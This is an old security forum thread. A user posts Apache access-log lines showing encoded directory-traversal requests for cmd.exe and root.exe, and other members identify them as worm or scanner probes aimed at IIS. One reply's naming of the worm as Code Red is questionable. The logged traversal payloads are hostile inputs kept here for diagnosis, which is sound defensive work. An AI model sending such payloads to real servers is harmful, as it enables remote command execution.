Results 1 to 6 of 6

Thread: Apache Security Question

  1. March 4th, 2003, 08:38 PM #1
    pr0letariat
    pr0letariat is offline
    Member
    Join Date
    Dec 2002
    Posts
    59

    Apache Security Question

    I am getting odd access log entrys
    My question is are these just scans or have they hacked my webserver?
    If they have hacked my server how can i monitor there activities?

    Here is part of my log


    24.153.55.96 - - [22/Oct/2002:22:33:42 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
    24.153.55.96 - - [22/Oct/2002:22:33:43 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
    24.153.55.96 - - [22/Oct/2002:22:33:43 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
    24.153.55.96 - - [22/Oct/2002:22:33:44 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
    24.153.55.96 - - [22/Oct/2002:22:33:44 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
    24.153.55.96 - - [22/Oct/2002:22:33:45 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
    24.153.55.96 - - [22/Oct/2002:22:33:45 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
    24.153.55.96 - - [22/Oct/2002:22:33:45 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
    24.153.55.96 - - [22/Oct/2002:22:33:46 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
    24.153.55.96 - - [22/Oct/2002:22:33:46 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
    24.153.55.96 - - [22/Oct/2002:22:33:47 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
    24.153.55.96 - - [22/Oct/2002:22:33:47 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
    24.153.55.96 - - [22/Oct/2002:22:33:48 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
    24.153.55.96 - - [22/Oct/2002:22:33:48 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
    24.153.55.96 - - [22/Oct/2002:22:33:48 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
    24.153.55.96 - - [22/Oct/2002:22:33:49 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
    When you connect to your ISP, you are potentially opening your computer to the world. There are \'naughty people\' out there who enjoy breaking into other people\'s computers. Give some thought to the security of your computer...
    http://www.AntiOnline.com/sig.php?imageid=360
    Reply With Quote Reply With Quote
  2. March 4th, 2003, 08:41 PM #2
    tampabay420
    tampabay420 is offline
    Senior Member tampabay420's Avatar
    Join Date
    Aug 2002
    Posts
    953
    i had previously suggested to Matt (the above poster) that he install some sort of IDS/Firewall like snort and ZoneAlarm... Is this some kind of skript kiddie attack? just some one snooping around- thanx for any replies...http://www.pivx.com/luigi/adv/AL001/apache_tmp.html
    yeah, I\'m gonna need that by friday...
    Reply With Quote Reply With Quote
  3. March 4th, 2003, 08:48 PM #3
    thehorse13
    thehorse13 is offline
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,885
    Looking at the timestamps and the targets, yes, this looks like someone trying to find exploits (via a scanner, virus or script). As to the question of being hacked, there isn't enough info here to say either way.

    Best advice would be to grab black ice defender or something of the like.

    Hope this helps out.
    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden
    Reply With Quote Reply With Quote
  4. March 4th, 2003, 08:49 PM #4
    DjM
    DjM is offline
    I'd rather be fishing DjM's Avatar
    Join Date
    Aug 2001
    Location
    The Great White North
    Posts
    1,867
    This is Code Red, a worm. You are running Apache, this worm targets IIS, so don't worry everyone gets these hits at least once a day.

    Cheers:

    /edit

    Code Red Info.

    DjM
    Reply With Quote Reply With Quote
  5. March 4th, 2003, 09:52 PM #5
    pythonas
    pythonas is offline
    Junior Member
    Join Date
    Jan 2003
    Posts
    3
    You have nothing to worry about. the target of the specific worm/exploit is IIS as it is obvious from the logs (it is a "famous" worm)
    Reply With Quote Reply With Quote
  6. March 4th, 2003, 10:47 PM #6
    nebulus200
    nebulus200 is offline
    Jaded Network Admin nebulus200's Avatar
    Join Date
    Jun 2002
    Posts
    1,356
    I went over something very similar to this ad nauseum here.

    /nebulus
    There is only one constant, one universal, it is the only real truth: causality. Action. Reaction. Cause and effect...There is no escape from it, we are forever slaves to it. Our only hope, our only peace is to understand it, to understand the 'why'. 'Why' is what separates us from them, you from me. 'Why' is the only real social power, without it you are powerless.

    (Merovingian - Matrix Reloaded)
    Reply With Quote Reply With Quote
« Previous Thread | Next Thread »

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

Forum Rules